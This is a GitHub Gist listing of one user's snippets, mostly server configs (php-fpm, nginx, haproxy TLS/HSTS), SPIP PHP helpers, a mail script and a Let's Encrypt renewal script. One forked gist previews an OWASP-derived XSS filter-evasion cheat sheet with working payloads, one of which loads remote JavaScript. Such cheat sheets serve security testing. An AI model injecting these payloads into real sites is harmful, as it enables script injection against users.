Skip to content

Instantly share code, notes, and snippets.

@tech-nova
tech-nova / seenthis.conf
Created February 24, 2017 11:34
Le pool php5-fpm pour seenthis
; Start a new pool named 'www'.
; the variable $pool can we used in any directive and will be replaced by the
; pool name ('www' here)
[www_seenthis]
; Per pool prefix
; It only applies on the following directives:
; - 'access.log'
; - 'slowlog'
; - 'listen' (unixsocket)
@tech-nova
tech-nova / seenthis.net.conf
Last active February 24, 2017 11:31
Configuration de nginx pour seenthis
# Les autres redirections sont gerees par default.conf
server {
listen 8080;
server_name seenthis.net;
access_log /var/www/seenthis.net/log/access.log combined buffer=512k flush=60m;
error_log /var/www/seenthis.net/log/error.log crit;
root /var/www/seenthis.net/public_html;
@tech-nova
tech-nova / haproxy.cfg
Created February 24, 2017 11:18
Configuration de haproxy
global
log /dev/log local0
log /dev/log local1 notice
chroot /var/lib/haproxy
stats socket /run/haproxy/admin.sock mode 660 level admin
stats timeout 30s
user haproxy
group haproxy
daemon
@tech-nova
tech-nova / haproxy.cfg
Created June 12, 2016 09:05 — forked from rnewson/haproxy.cfg
haproxy.cfg stanzas to enable Perfect Forward Secrecy and HTTP Strict Transport Security. Requires OpenSSL 1.0.1g or so.
# Bind SSL port with PFS-enabling cipher suite
bind :443 ssl crt path_to_certificate no-tls-tickets ciphers ECDHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-RSA-AES128-SHA256:ECDHE-RSA-AES128-SHA:ECDHE-RSA-AES256-SHA384:ECDHE-RSA-AES256-SHA:ECDHE-RSA-RC4-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA256:AES128-SHA:AES256-SHA256:AES256-SHA:RC4-SHA
# Distinguish between secure and insecure requests
acl secure dst_port eq 443
# Mark all cookies as secure if sent over SSL
rsprep ^Set-Cookie:\ (.*) Set-Cookie:\ \1;\ Secure if secure
# Add the HSTS header with a 1 year max-age
@tech-nova
tech-nova / balise_dynamique_perso.php
Created April 9, 2016 10:04
Créer une balise dynamique perso
<?php
function balise_GESTION_TRUC ($p) {
return calculer_balise_dynamique($p, 'GESTION_TRUC', array());
}
function balise_GESTION_TRUC_dyn() {
// Faire des choses en PHP
// Retourner directement un résultat à afficher
@tech-nova
tech-nova / mail_form_utf8_content.php
Last active March 10, 2016 08:46
Pour envoyer un mail en utf-8 (code forgé à la main)
<?php
// Code utilisé pour envoyer un message utf8
// Sous deux formats (html + texte)
// Sans problème d'accent
// Les données injectées dans le mail proviennent d'une page encodée en utf_8
// via <meta charset>
$message_txt = sprintf(utf8_encode("Vous avez reçu un message depuis le formulaire de contact :
@tech-nova
tech-nova / statistiques sur les clics
Last active February 19, 2016 10:40
Des statistiques sur les 6 derniers mois
<?php
if (!defined("_ECRIRE_INC_VERSION")) return; // securiser
include_spip("base/clics");
function action_stats() {
include_spip("inc/filtres");
$lastmonth = mktime(0, 0, 0, date("m")-6, date("d"), date("Y"));
if (!_request('min') OR !_request('max')) {
$url1 = parametre_url(self(),'min',sinon(_request('min'),date('Y-m-d',$lastmonth)));
@tech-nova
tech-nova / xss-owasp-cheatsheet
Created February 14, 2016 21:38 — forked from sseffa/xss-owasp-cheatsheet
xss-owasp-cheatsheet
#
# https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
# based on the RSnake original http://ha.ckers.org/xss.html
# Retrieved on 2013-11-20
# Much of this wildly obsolete
#
# XSS Locator 2
'';!--"<XSS>=&{()}
1) <iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>
2) <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
3) <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
4) <sVg><scRipt %00>alert&lpar;1&rpar; {Opera}
5) <img/src=`%00` onerror=this.onerror=confirm(1)
6) <form><isindex formaction="javascript&colon;confirm(1)"
7) <img src=`%00`&NewLine; onerror=alert(1)&NewLine;
8) <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
9) <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
10) <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
@tech-nova
tech-nova / le-renew.sh
Created January 14, 2016 12:02
Script pour renouveler le certificat Letsencrypt lorsqu'il a moins de 30 jours de validité
#!/bin/bash
# Avec /etc/cron.d/check-letsencrypt pour renouveler le certificat Letsencrypt
# 30 1 * * 1 root /usr/local/sbin/le-renew-webroot >> /var/log/le-renewal.log
# Configuration de nginx : centminmod
web_service='nginx'
domain='epoxit.com'
config_file="/home/nginx/domains/$domain/private/letsencrypt/le-renew-webroot.ini"